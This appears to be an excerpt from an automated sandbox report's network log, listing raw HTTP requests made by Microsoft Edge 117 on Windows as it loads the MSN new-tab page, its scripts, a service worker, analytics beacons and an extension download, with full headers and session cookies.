                Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.d0b81df0decfa0886dfe.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.8ed343c804e9069b52b4.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.a8bc96a9c4710d87d862.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.eee185b1083ffdf6d054.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.026b9a80c7ff937f7d4f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1738257081027&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=145825B7BD7A64E20DCF3033BCF06578&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257081027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=906330005d7047b1adccdfa6b3e22806&activityId=906330005d7047b1adccdfa6b3e22806&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /b2?rn=1738257081027&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=145825B7BD7A64E20DCF3033BCF06578&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B2a9603c814aa64121dd681738257082; XID=1B2a9603c814aa64121dd681738257082
                Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 7.25sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=1c2acd7c-e63a-498f-9657-1fee0450e1d6; ai_session=EtxE78cLNeGADtnKNG2Dia|1738257081023|1738257081023; 
sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z
                Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":33,"imageId":"BB1msyO5","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=1c2acd7c-e63a-498f-9657-1fee0450e1d6; ai_session=EtxE78cLNeGADtnKNG2Dia|1738257081023|1738257081023; 
sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257081027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=906330005d7047b1adccdfa6b3e22806&activityId=906330005d7047b1adccdfa6b3e22806&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FA1E4F4371E43A1B8D6A56A2A450B69&MUID=145825B7BD7A64E20DCF3033BCF06578 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; SM=T; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                Source: global trafficHTTP traffic detected: GET /edge/ntp?&form=MT004B&OCID=MT004B HTTP/1.1Host: ntp.msn.comConnection: keep-alivedevice-memory: 8sec-ch-dpr: 1sec-ch-viewport-width: 1232sec-ch-viewport-height: 910rtt: 200downlink: 10ect: 4gsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":33,"imageId":"BB1msyO5","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vp":{"height":876,"width":1232},"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: pglt-edgeChromium-dhp=547; USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; msnup=%7B%22cnex%22%3A%22no%22%7D
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257090593&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68582199850e45b7ad01a954e30970e7&activityId=68582199850e45b7ad01a954e30970e7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; SM=C; SRM_M=145825B7BD7A64E20DCF3033BCF06578; MR=0; ANONCHK=0; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257090593&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68582199850e45b7ad01a954e30970e7&activityId=68582199850e45b7ad01a954e30970e7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&CtsSyncId=8409F82092954CD0B5D89F060BC43C3C&MUID=1CEEFCDF50C667711B38E95B514A66A6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; SRM_M=145825B7BD7A64E20DCF3033BCF06578; MR=0; ANONCHK=0; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6; SM=T
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=cfb3017e-dde0-4295-9acf-74a966b96ae2&ii=1&c=656232445000136485&bid=094657a1-39df-433d-9d2c-a24746fb158d&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":29,"imageId":"BB1msOZa","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vp":{"height":876,"width":1232},"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004BAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: pglt-edgeChromium-dhp=547; _C_Auth=; pglt-edgeChromium-ntp=2083; USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; msnup=%7B%22cnex%22%3A%22no%22%7D; sptmarket=en-gb||us|en-us|en-us|en||cf=8|RefA=68582199850E45B7AD01A954E30970E7.RefC=2025-01-30T17:11:30Z; MUID=1CEEFCDF50C667711B38E95B514A66A6; 